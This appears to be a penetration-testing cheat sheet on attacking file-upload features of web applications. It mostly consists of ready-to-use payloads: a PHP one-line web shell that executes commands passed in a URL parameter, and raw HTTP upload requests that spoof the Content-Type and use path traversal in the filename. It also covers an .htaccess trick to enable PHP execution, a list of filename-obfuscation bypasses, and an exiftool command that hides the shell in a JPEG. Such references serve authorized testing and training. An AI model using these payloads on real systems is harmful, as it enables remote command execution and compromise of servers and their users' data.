File uploads

Unrestricted

If there is no validation in place at all, one can just upload a malicious file.

<?php echo system($_GET['cmd']); ?>
cmd
description

exec

Execute an external program

passthru

Execute an external program and display raw output

shell_exec

Execute command via shell and return the complete output as a string

system

Execute an external program and display the output

Bypass file type validation

If there is no proper file type validation in place, it may be possible to send a valid Content-Type together with the malicious file.

POST /path HTTP/1.1
Host: website.com
Content-Length: 1337
Content-Type: multipart/form-data; boundary=---------------------------41688721411166396114242705702

---------------------------41688721411166396114242705702
Content-Disposition: form-data; name="image"; filename="cmd.php"
Content-Type: image/jpeg

<?php echo system($_GET['cmd']); ?>
---------------------------41688721411166396114242705702--

Upload file to another directory (path traversal)

If the malicous file can be uploaded but is not executed by the webserver, it may be possible to upload it to another directory, from which execution is possible.

POST /path HTTP/1.1
Host: website.com
Content-Length: 1337
Content-Type: multipart/form-data; boundary=---------------------------41688721411166396114242705702

---------------------------41688721411166396114242705702
Content-Disposition: form-data; name="image"; filename="..%2fcmd.php"
Content-Type: image/jpeg

<?php echo system($_GET['cmd']); ?>
---------------------------41688721411166396114242705702--

Bypass file type filtering

Sometimes insufficient blacklist filtering is in place, which may be bypassed. Instead of .php use extensions like .php5 or .shtml etc.

If possible, also try to enable execution by placing an .htaccess file in the directory.

AddType application/x-httpd-php .php5

Obfuscating file extensions

Depending on the validation mechanisms in place, some of the following may bypass them.

  • Case sensitive, e.g. cmd.pHp

  • Multiple extensions, e.g. cmd.php.jpg

  • URL encoding, e.g. cmd%2ephp

  • Null byte, e.g. cmd.php%00.jpg

  • Semicolons, e.g. cmd.php;.jpg

  • Multibyte encoding

  • Non recursive filters, e.g. cmd.p.phphp

Polyglot (php/jpg)

E.g. using exiftool to add php code in the comment field of a jpg.

exiftool -Comment="<?php echo system($_GET['cmd']); ?>" image.jpg -o polyglot.php

Last updated